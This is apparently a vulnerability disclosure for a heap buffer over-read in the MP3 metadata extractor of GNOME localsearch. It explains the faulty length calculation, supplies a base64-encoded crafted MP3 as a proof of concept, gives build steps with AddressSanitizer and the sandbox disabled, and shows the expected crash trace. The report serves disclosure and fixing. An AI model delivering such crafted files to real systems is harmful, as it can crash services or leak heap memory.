Vulnerability Report: Heap Buffer Overflow in GNOME localsearch MP3 Extractor
Project: https://gitlab.gnome.org/GNOME/localsearch
Component: tracker-extract-mp3
Vulnerability Type: Heap Buffer Overflow (Read)

Description
A heap buffer overflow vulnerability exists in the extract_performers_tags function of src/extractor/tracker-extract-mp3.c. A specially crafted MP3 file with malformed ID3 tags can cause the extractor to read beyond the allocated buffer when parsing performer tags, potentially leading to information disclosure or a crash (Denial of Service).

Root Cause Analysis
The vulnerability occurs in the loop that parses performer tags:

// src/extractor/tracker-extract-mp3.c:1431 (approximate)
while (pos + offset < csize) {
    // ...
    text_instrument = &data[pos];
    // ...
    offset = text_instrument_len + id3v2_nul_size (text_encode);
    text_performer = &data[pos + offset];

    // VULNERABILITY: Incorrect length calculation
    if (version == 2.4f) {
        performer = id3v24_text_to_utf8 (text_encode, text_performer, csize - offset, info);
    } else {
        performer = id3v2_text_to_utf8 (text_encode, text_performer, csize - offset, info);
    }
    // ...
    pos += text_instrument_len + text_performer_len + 2*id3v2_nul_size (text_encode);
}


The id3v2_text_to_utf8 function is passed csize - offset as the maximum length. However, text_performer points to data[pos + offset]. The correct remaining size should be csize - pos - offset. As pos increases in subsequent iterations, csize - offset remains larger than the actual remaining buffer after text_performer, allowing id3v2_text_to_utf8 (and subsequently iconv) to read past the end of the data buffer.

Impact


Denial of Service: The out-of-bounds read can access unmapped memory, causing the tracker-extract process to segfault.

Information Disclosure: It may be possible to read sensitive data from the heap if the read does not cause a crash.


Using the Real Binary (PoC)
To definitively reproduce this with the system binary codebase, you must build it with AddressSanitizer and disable sandboxing (which conflicts with ASAN).

You can recreate the reproduction.mp3 file by decoding this base64 string:


base64 -d <<EOF > reproduction.mp3
SUQzAwAAAAAOZ1RJVDMAAAAGAAAAdGl0bGVUUEUxAAAABwAAAGFydGlzdFRQRTIAAAANAAAAYWxi
dW0gYXJ0aXN0VEFMQgAAAAYAAABhbGJ1bVRQT1MAAAADAAAAMDFUUkNLAAAABgAAADAxLzAySVBM
UwAAAAwAAAAAAAAAY29tbWVudElQTFMAAAAJAAAAY29tcG9zZXJUT1BFAAAAEAAAAG9yadlpbmFs
IGFydGlzdFRDT1AAAAAKAAAAY29weXJpZ2h0V1hYWAAAABQAAAAAaHR0cDovL2V4YW1wbGUuY29t
VEVOQwAAAAgAAABlbmNvZGVySVBMUwAAAklEMwIAAAAAAQdUVDIAAAoARm9yc2FrZW4AVFJLAAAF
ADIvOABUUDEAAA8ARHJlYW0gVGhlYXRlcgBUQUwAABIAU3lzdGVtYXRpYyBDaGFvcwBUUEEAAAUA
MS8xAFJWQQAACgMQ/////wAAAABUWUUAAAYAMjAwNwBUUDEAABIAUHJvZ3Jlc3NpdmUgUm9jawD/
+uJkSMsAD/AAAGkHAAAAAAANIOAAAAAAAaQUAAAAAAA0goAAAExBTUUzLjgyVVVVVVVVVVVVVVVV
VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV
VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV
VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV
VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV
VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV
VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV
VVVVVVVVVVVVVVVBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGltYWdlL3BuZwADY292ZXIucG5nAIlQTkcN
ChoKAAAADUlIRFIAVVVVVVVVVVVVVVVVVVVVVVVMQU1FMy4xMDBVVVVVVVVVVVVVVVVVVVVVVVVV
VVVV//sUZB4P8AAAaQAAAAgAAA0gAAABAAABpAAAACAAADSAAAAEVVVVVVVVVVVVVVVVVVVVVVVV
VVVVVVVVVVVVVVVMQU1FMy4xMDBVVVVVVVVVVVVVVVVVVVVVVVVVVVVV//sUZDwP8AAAaQAAAAgA
AA0gAAABAAABpAAAACAAADSAAAAEVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVMQU1FMy4x
MDBVVVVVVVVVVVVVVVVVVVVVVVVVVVVV//sUZFoP8AAAaQAAAAgAAA0gAAABAAABpAAAACAAADSA
AAAEVVVVVVVVVVVVVVVVVVVVVVVVVVVVVXVVVVVVVVVMQU1FMy4xMDBVVVVVVVVVVVVVVVVVVVVV
VVVVVVVV//sUZHgP8AAAaQAAAAgAAA0gAAABAAABpAAAACAAX1JoEePBcT/e3XvcvQP8jQpTzWAc
UDXLSCcTQja3KnS/IohBhDCBMYmZ+pwopuA5vu7h4+sAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAFVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV
VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV
VVVVVVVVVVVVVVVVVVVVVf9VpgDgOmd6gOZOo5H+YDoAJgogMmfAVwZi4bX+YBADQsAYY6wRxisi
c/5iIDCEDnABAAAAAAAAXUh500b//hwLMKgFHQ5hBjga+OVIT//0kAgEKHpJmrVWbQM5ssrmjEh/
//hAHYQrAXQZ+a9KhrIqGbzuaiJJqEu////snSvbAyROh6zIhWNBjI0ARjH5PM6C8zySf////aer
uDGmMEg11zFQ+M1h4zQQjEY3MwEAAAAAABEG/////ZfBjqOJBrrsvjzqGWwYZSGxhETmVAOZPHZg
gSAJbGSh4AQ////////uJHX7cePPw/kdft35UClSZHHoWDAKTxkIdBUKkycMbjcqA4iTZjYcf///
//////xSMTMXh+mikYqxenrSyMWRwEiSIMXjcKgIOQ5iYXCIBhh4MTjEuUCjuYiGAQBQEdDD4x//
////////////////+Xxu1LKSzL6+VjCvbwqWM8+/hzPP8MPEgkY5AZhoZDwZAxUMHiFEYMH5goLK
WiQwMAglpw8B0TH5X41uehcMWZZT37djH/kSmBjAE3mo+rz/skBQGBn8jamVMKR/lu3PMM4TIxag
3P8HBsQAA6twjiSD//QMAQoRDO0wU6MIzNJ4//9PsHBNPRWA5c2DVK0OEIIzqhf//8IBCwasZdNh
BoZGmxyuZsOhmM7Gohh///+rAjgzNv/64kTES/+ADHyQQgZ7gAGDEgeQz3AAHLHVHh3HgAuUM+KD
u4AATq7bAZ/OppwemlSmY6JhmkiGkC1////7TF0Pi09g8EOoYpIJm4JmZSCYkHRl0RGYBsYbF///
///66IJdddcefhrkdfsyQJzL4zMTDQy6DDKhAAIdMmAUyOOQYGP//////9l8GOo0yPv2/VVVVVX/
+xRk4Y/wAABpAAAACAAADSAAAAEAAAGkAAAAIAAANIAAAARVVVVVVVVVVVVVVVVVVVVVVVVVVVVV
VVVVVVVVVUxBTUUzLjEwMFVVVVVVVVVVVVVVVVVVVVVVVVVVVVX/+xRk4Y/wAABpAAAACAAADSAA
AAEAAAGkAAAAIAAANIAAAARVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV
VVVVVVVVVVVVVVVVVVVVVVVVVVX/+xRk4Y/wAABpAAAACAAADSAAAAEAAAGkAAAAIAAANIAAAARV
VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV
VVX/+xRk4Y/wAABpAAAACAAADSAAAAEAAAGkAAAAIAAANIAAAARVVVVVVVVVVVVVVVVVVVVVVVVV
VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVX/+xRk4Y/wAABpAAAACAAA
DSAAAAEAAAGkAAAAIAAANIAAAARVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV
VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVX/+xRk4Y/wAABpAAAACAAADSAAAAEAAAGkAAAAIAAANIAA
AARVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV
VVVVVVX/+xRk4Y/wAABpAAAACAAADSAAAAEAAAGkAAAAIAAANIAAAARVVVVVVVVVVVVVVVVVVVVV
VVRVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVX////1DQAAAAA6DmdU////////////////
//9vbGluAHZpb2xpbmlzdABUWFhYAAAAJQAAA011c2ljQnJhaW56IFJlbGVhc2UgR3JvdXAgGBgX
FBYWGh0lHxobIxwWFiAsIComJykqKRkfLTAtKDAlKCko/9sAQwEHBwcKCAoTCgoTKBoWGigoKCgo
KCgoKCgoKCgoKCgoKCgoKCgoKCgoH2DSNS1OG1+zRybWvZW+YlsnJb2FZVajp620PUyzLlmFT2Sn
aW+2lvv/AEPp2iviz+39Z/6C+pf+A011c2ljQnJhaW56IFJlbGVhc2Xj5OXm5+jp6vHy8/T19vf4
+fr/xAAfAQADAQEBAQEBAQEBAAAAAAAAAQIDBAUGBwoJCgv/xAC1EQACAQIEBAMEBwUEBAABAncA
AQIDEQQFITEGEkFRB2FxEyIygQgUSUT///////////////////////////9hUExTAf////////UN
AAAAADoOZ1RJVAD//////3r/9/8n//8m/yf//1xcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxc
XP////////////9/////////////////Af////////UNAAAAADoOZ1MB////////9Q0AAAAAOg5n
VElUAP//////ev/3/yf//yb/J////////////////3////////////////8B////////9Q0AAAAA
Og5nVP////////////////////////9hUExTAf////////UNAAAAADoO////9Q0AAAAAOg5nVElU
AFRPTFlVVTPb2sj/ALydwiHu5xmlqUrI7LxH418R+MLxptX1m8ulXJ2n5Y48/wB1VwB+VcvNfLFJ
tD3Er9yXxz/On3LRx2zCGXCAdR/Gfas+2GIZpuC4GFyeme9Fh3JJtVumY7ZGX8cn86ptJLO3zM8j
e/NN4wcnmkVyv3Tg+1O1iG29x4hmPSJ/++aekcwP+rYfVaI7uTtPII5BoA6qivzwHijxDgf8T/V/
/A2X/wCKo/4SjxB/0H9X/wDA2X/4qlcVz9D6K8y/Zxu7m++E+mT31zPcztLODJNIXY4lbGSea9Np
jCiiqmrX0Ol6Xd31yQsNtE0rk+gGaG7ajjEma3KsyjAJVv8AA145E20g9xXo0XzQTZ5tZctRmpo4
ZNWs+Osyj25Lq6i0TyfnjhRjgojdJJDnnbkDHJ45+j/CtpcWHoKCgoKCgoKCgoKCgoKCgoKCgoKC
goKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKC
goKCgoKCgoKCgv///////xrS7S9ObmC2jjk5z8wUA12YdNRsz4nP8TSxOMlOlqtFfvb+rGpXxX4k
/wCRj1b/AK9DT01Nub/0M19qV8V+JP8AkY9W/wCvuVVVVVVVVVVVVVVVVf/7FGThj/AAAGkAAAAI
AAANIAAAAQAAAaQAAAAgAAA0gAAABFVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVUB
AAAAAAACVFVVVVVVVVVVVVVVVVVVVVVVVf/7FGThj/AAAGkAAAAIAAANIAAAAQAAAaQAAAAAAAAA
AAAA//tUAAAAAAAAAAAAAAAAAAAA7vHx9fikAAAAIAAANIAAAARVVVVVVVVVVVVVVVVVVVVVVVVV
VVVVVVVVVVVVVUxBTUUzLjEwMFVVVVVVVVVVVVVVVVVVVVVVVVVVVVX/+xRkWg/wAABpAAAACAAA
DSAAAAEAAAGkAAAAIAAANIAAAARVVVVVVVVVVVVVVVVVVVVVVVVVVVVVdVVVVVVVVUxBTUUzLjEw
MFVVVVVVVVVVVVVVVVVVVVVVVVVVVVX/+xRkeA/wAABpAAAACAAADSAAAAEAAAGkAAAAIABfUmgR
48FxP97de9y9A/yNClPNYBxQNctIJxNCNrcqdL8iiEGEMIExiZn6nCim4Dm+7uHj6wAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA//tUAAAAAAAAAAAAAAAAAAAA7vHx9fj4
/P8AAAAATGF2YzE2LjU0AAAAAAAAAAAAAAAAJATwAAAAAAD6GwCmPiyu//sUZAAP8A7R8/dOWvt5
TN6t39yYeHIZHQyiZbTocHBAijTgSJdfhJFbiKhlz975rIStEdUYxkl2AAAgAAA0gADwl1oYz/U/
/w1VMSFCRzEQATEwIQOTMCdA1zBUwX0wLcEVMC0DsDLj0BgxagIkMEcCDDAPghwzPgAQMDeAWTAN
wAkwNgCVMSCC7DAgABUGgNhgIAC2YBUAFMNMB+AjjAlyEwyTsBlMALAAxIApBwJIVmEgLBUIzFSw
TA0dTBoBjF8TTro2z2saTD0xxUiTEAGzH8BDBYBAEEzClBWDGAITGKyFAa4GfwHebMqNTZOoxyDk
ZARtUBKbCtzYl6OjKkACDDlv2qnDzAwqAkM4djEw5kmbg8cna421ydcKJvvlhANDD0ES+NNQXbEI
/KuT1JyApbDNTUzQzEYppdQEfkkJkiVDNWOzBAkIRYeagFyomekSkwbJu5xoli7+xXv/9Z/09Xz/
pv+dHWf/z/9A9L3Cf//A4GX3///6v6DGZD6KBKDDUFjqAAABhGlDQ1BJQ0MgcHJvZmlsZQAAKJF9
kT1Iw0AcxV8/xCIVBzuoOGSoLloQFXGsVShChVArtOpgcuEXNGlIUlwcBdeCgx+LVQcXZ10dXAVB
8APE2cFJ0UVK/F9SaBHjwXE/3t173L0D/I0KU81gHFA1y0gnEwAAg4BggAHxlOT93olq09q9K79S
aQAAAAgAAA0gAAABAEI2typ0vyKIQYQsgTGJmfqcKKbgOb7u4ePrXQAACAAADSAAAAEAAAGkAAAA
IAAANAABqOTNqc2AAAAEVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV
VVVVVVVVVVVVVVVVVVVVVVVV//sUZOGP8AAAaQAAAAgAAA0gAAABAAABpAAAANRcGqTkqrBAHg8B
4q45TiBJXTkCpAAAACAAADSAAAAEVVVVVVVVVVVVVVVVVVXw8yRRjiAAklVVVVVVVVVVVVVVVVVV
VVVVVVVVVVU/HFVVVQA0gFVVVVU+AAAEVVVVVVVVVVVVVVVVVVVVVVVVVVVVVQ==
EOF




Build localsearch with AddressSanitizer:
Note: -Dseccomp=false is critical because the sandbox blocks ASAN's operation.

sudo apt install -y meson ninja-build libglib2.0-dev libtracker-sparql-3.0-dev libgin-dev python3-typogrify

# Configure build (minimal MP3-only build for testing)
meson setup build \
  -Db_sanitize=address \
  -Dseccomp=false \
  -Dlandlock=disabled \
  -Dextract=true \
  -Dminer_fs=false \
  -Dfunctional_tests=false \
  -Dman=false

# Compile
meson compile -C build




Run tracker-extract manually:
You must point the extractor to its rules directory if running uninstalled.

export TRACKER_EXTRACTORS_DIR=$(pwd)/build/src/extractor
export TRACKER_EXTRACTOR_RULES_DIR=$(pwd)/build/src/extractor/uninstalled-rules

# Run with ASAN options to suppress ODR violations (common in combined builds)
ASAN_OPTIONS=detect_odr_violation=0 ./build/src/extractor/localsearch-extractor-3 --file vulnerability_reports/reproduction.mp3




Expected Output:

==1767498==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x5160000002c8 at pc 0x77de104baf4a bp 0x7ffebb984220 sp 0x7ffebb9839c8
READ of size 582 at 0x5160000002c8 thread T0
    #0 0x77de104baf49 in iconv ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:5369
    #1 0x77de0fef0cc1 in g_convert_with_iconv (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x39cc1) (BuildId: 94bfd21331c311d3199726de93a2656d07c22b33)
    #2 0x77de0fef0f81 in g_convert (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x39f81) (BuildId: 94bfd21331c311d3199726de93a2656d07c22b33)
    #3 0x77de0ce50d14 in convert_to_encoding ../src/extractor/tracker-extract-mp3.c:837
    #4 0x77de0ce534ed in id3v2_text_to_utf8 ../src/extractor/tracker-extract-mp3.c:1311
    #5 0x77de0ce53ca1 in extract_performers_tags ../src/extractor/tracker-extract-mp3.c:1446
    #6 0x77de0ce55f71 in get_id3v23_tags ../src/extractor/tracker-extract-mp3.c:1836
    #7 0x77de0ce58aaf in parse_id3v23 ../src/extractor/tracker-extract-mp3.c:2484
    #8 0x77de0ce5961e in parse_id3v2 ../src/extractor/tracker-extract-mp3.c:2616
    #9 0x77de0ce59bd0 in tracker_extract_get_metadata ../src/extractor/tracker-extract-mp3.c:2697
    #10 0x6113d08aed28 in get_file_metadata ../src/extractor/tracker-extract.c:217
    #11 0x6113d08b0a30 in tracker_extract_file_sync ../src/extractor/tracker-extract.c:509
    #12 0x6113d08b4f2d in run_standalone ../src/extractor/tracker-main.c:218
    #13 0x6113d08b5aa7 in do_main ../src/extractor/tracker-main.c:370
    #14 0x6113d08b6475 in main ../src/extractor/tracker-main.c:469
    #15 0x77de0f82a1c9 in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
    #16 0x77de0f82a28a in __libc_start_main_impl ../csu/libc-start.c:360
    #17 0x6113d08a6684 in _start (/tmp/localsearch/build/src/extractor/localsearch-extractor-3+0x12684) (BuildId: f9112407d77014a3cdb422851c1f4cce6c2b9852)

0x5160000002c8 is located 0 bytes after 584-byte region [0x516000000080,0x5160000002c8)
allocated by thread T0 here:
    #0 0x77de104fd340 in calloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:77
    #1 0x77de0ff1a721 in g_malloc0 (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x63721) (BuildId: 94bfd21331c311d3199726de93a2656d07c22b33)
    #2 0x77de0ce507f9 in un_unsync ../src/extractor/tracker-extract-mp3.c:767
    #3 0x77de0ce58a33 in parse_id3v23 ../src/extractor/tracker-extract-mp3.c:2483
    #4 0x77de0ce5961e in parse_id3v2 ../src/extractor/tracker-extract-mp3.c:2616
    #5 0x77de0ce59bd0 in tracker_extract_get_metadata ../src/extractor/tracker-extract-mp3.c:2697
    #6 0x6113d08aed28 in get_file_metadata ../src/extractor/tracker-extract.c:217
    #7 0x6113d08b0a30 in tracker_extract_file_sync ../src/extractor/tracker-extract.c:509
    #8 0x6113d08b4f2d in run_standalone ../src/extractor/tracker-main.c:218
    #9 0x6113d08b5aa7 in do_main ../src/extractor/tracker-main.c:370
    #10 0x6113d08b6475 in main ../src/extractor/tracker-main.c:469
    #11 0x77de0f82a1c9 in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
    #12 0x77de0f82a28a in __libc_start_main_impl ../csu/libc-start.c:360
    #13 0x6113d08a6684 in _start (/tmp/localsearch/build/src/extractor/localsearch-extractor-3+0x12684) (BuildId: f9112407d77014a3cdb422851c1f4cce6c2b9852)

SUMMARY: AddressSanitizer: heap-buffer-overflow ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:5369 in iconv
Shadow bytes around the buggy address:
  0x516000000000: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x516000000080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x516000000100: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x516000000180: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x516000000200: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x516000000280: 00 00 00 00 00 00 00 00 00[fa]fa fa fa fa fa fa
  0x516000000300: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x516000000380: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x516000000400: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x516000000480: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x516000000500: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==1767498==ABORTING